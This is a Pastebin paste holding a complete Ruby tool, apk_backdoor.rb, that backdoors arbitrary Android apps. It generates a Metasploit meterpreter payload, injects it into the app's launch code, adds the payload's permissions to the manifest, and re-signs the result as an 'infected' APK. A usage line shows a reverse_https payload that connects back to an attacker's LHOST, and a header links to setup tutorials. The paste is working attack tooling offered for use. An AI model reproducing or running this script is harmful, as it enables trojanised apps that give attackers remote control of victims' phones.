Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # HOW TO USE
- # Your dependencies may not have been in order resulting in a broken payload. Please, follow along by building a developer environment alike this video. Install Debian 8.2 from the Live XFCE dvd. Continue by installing the dependencies found on the cheat sheet in http://pischool.com .
- # STEP #1: (follow these steps->) https://pastebin.com/y7SCd4tq
- # STEP #2: (follow VIDEO TUT->) https://www.youtube.com/watch?v=uytuVP8f-54&ab_channel=JohnSilvaggio
- # Github --infos: https://github.com/Jack64/metasploit-framework/pull/3
- # ------------ SCRIPT BELOW ------------
- #!/usr/bin/env ruby
- # apk_backdoor.rb
- # This script is a POC for injecting metasploit payloads on
- # arbitrary APKs.
- # Authored by timwr, Jack64
- require 'nokogiri'
- require 'fileutils'
- require 'optparse'
- # Find the activity thatapk_backdoor.rb is opened when you click the app icon
- def findlauncheractivity(amanifest)
- package = amanifest.xpath("//manifest").first['package']
- activities = amanifest.xpath("//activity|//activity-alias")
- for activity in activities
- activityname = activity.attribute("name")
- category = activity.search('category')
- unless category
- next
- end
- for cat in category
- categoryname = cat.attribute('name')
- if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN')
- activityname = activityname.to_s
- unless activityname.start_with?(package)
- activityname = package + activityname
- end
- return activityname
- end
- end
- end
- end
- # If XML parsing of the manifest fails, recursively search
- # the smali code for the onCreate() hook and let the user
- # pick the injection point
- def scrapeFilesForLauncherActivity()
- smali_files||=[]
- Dir.glob('original/smali*/**/*.smali') do |file|
- checkFile=File.read(file)
- if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V")
- smali_files << file
- smalifile = file
- activitysmali = checkFile
- end
- end
- i=0
- print "[*] Please choose from one of the following:\n"
- smali_files.each{|s_file|
- print "[+] Hook point ",i,": ",s_file,"\n"
- i+=1
- }
- hook=-1
- while (hook < 0 || hook>i)
- print "\nHook: "
- hook = STDIN.gets.chomp.to_i
- end
- i=0
- smalifile=""
- activitysmali=""
- smali_files.each{|s_file|
- if (i==hook)
- checkFile=File.read(s_file)
- smalifile=s_file
- activitysmali = checkFile
- break
- end
- i+=1
- }
- return [smalifile,activitysmali]
- end
- def fix_manifest()
- payload_permissions=[]
- #Load payload's permissions
- File.open("payload/AndroidManifest.xml","r"){|file|
- k=File.read(file)
- payload_manifest=Nokogiri::XML(k)
- permissions = payload_manifest.xpath("//manifest/uses-permission")
- for permission in permissions
- name=permission.attribute("name")
- payload_permissions << name.to_s
- end
- # print "#{k}"
- }
- original_permissions=[]
- apk_mani=''
- #Load original apk's permissions
- File.open("original/AndroidManifest.xml","r"){|file2|
- k=File.read(file2)
- apk_mani=k
- original_manifest=Nokogiri::XML(k)
- permissions = original_manifest.xpath("//manifest/uses-permission")
- for permission in permissions
- name=permission.attribute("name")
- original_permissions << name.to_s
- end
- # print "#{k}"
- }
- #Get permissions that are not in original APK
- add_permissions=[]
- for permission in payload_permissions
- if !(original_permissions.include? permission)
- print "[*] Adding #{permission}\n"
- add_permissions << permission
- end
- end
- inject=0
- new_mani=""
- #Inject permissions in original APK's manifest
- for line in apk_mani.split("\n")
- if (line.include? "uses-permission" and inject==0)
- for permission in add_permissions
- new_mani << '<uses-permission android:name="'+permission+'"/>'+"\n"
- end
- new_mani << line+"\n"
- inject=1
- else
- new_mani << line+"\n"
- end
- end
- File.open("original/AndroidManifest.xml", "w") {|file| file.puts new_mani }
- end
- apkfile = ARGV[0]
- unless(apkfile && File.readable?(apkfile))
- puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
- puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"
- exit(1)
- end
- jarsigner = `which jarsigner`
- unless(jarsigner && jarsigner.length > 0)
- puts "No jarsigner"
- exit(1)
- end
- apktool = `which apktool`
- unless(apktool && apktool.length > 0)
- puts "No apktool"
- exit(1)
- end
- apk_v=`apktool`
- unless(apk_v.split()[1].include?("v2."))
- puts "[-] Apktool version #{apk_v} not supported, please download the latest 2. version from git.\n"
- exit(1)
- end
- begin
- msfvenom_opts = ARGV[1,ARGV.length]
- opts=""
- msfvenom_opts.each{|x|
- opts+=x
- opts+=" "
- }
- rescue
- puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
- puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"
- puts "[-] Error parsing msfvenom options. Exiting.\n"
- exit(1)
- end
- print "[*] Generating msfvenom payload..\n"
- res=`msfvenom -f raw #{opts} -o payload.apk 2>&1`
- if res.downcase.include?("invalid" || "error")
- puts res
- exit(1)
- end
- print "[*] Signing payload..\n"
- `jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA payload.apk androiddebugkey`
- `rm -rf original`
- `rm -rf payload`
- `cp #{apkfile} original.apk`
- print "[*] Decompiling orignal APK..\n"
- `apktool d $(pwd)/original.apk -o $(pwd)/original`
- print "[*] Decompiling payload APK..\n"
- `apktool d $(pwd)/payload.apk -o $(pwd)/payload`
- f = File.open("original/AndroidManifest.xml")
- amanifest = Nokogiri::XML(f)
- f.close
- print "[*] Locating onCreate() hook..\n"
- launcheractivity = findlauncheractivity(amanifest)
- smalifile = 'original/smali/' + launcheractivity.gsub(/\./, "/") + '.smali'
- begin
- activitysmali = File.read(smalifile)
- rescue Errno::ENOENT
- print "[!] Unable to find correct hook automatically\n"
- begin
- results=scrapeFilesForLauncherActivity()
- smalifile=results[0]
- activitysmali=results[1]
- rescue
- puts "[-] Error finding launcher activity. Exiting"
- exit(1)
- end
- end
- print "[*] Copying payload files..\n"
- FileUtils.mkdir_p('original/smali/com/metasploit/stage/')
- FileUtils.cp Dir.glob('payload/smali/com/metasploit/stage/Payload*.smali'), 'original/smali/com/metasploit/stage/'
- activitycreate = ';->onCreate(Landroid/os/Bundle;)V'
- payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V"
- hookedsmali = activitysmali.gsub(activitycreate, payloadhook)
- print "[*] Loading ",smalifile," and injecting payload..\n"
- File.open(smalifile, "w") {|file| file.puts hookedsmali }
- injected_apk=apkfile.split(".")[0]
- injected_apk+="_backdoored.apk"
- print "[*] Poisoning the manifest with meterpreter permissions..\n"
- fix_manifest()
- print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n"
- `apktool b -o $(pwd)/#{injected_apk} $(pwd)/original`
- print "[*] Signing #{injected_apk} ..\n"
- `jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey`
- puts "[+] Infected file #{injected_apk} ready.\n"
- # ------------ SCRIPT ABOVE ------------
- # SRC: http://pastebin.com/dc2LEQJ5
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement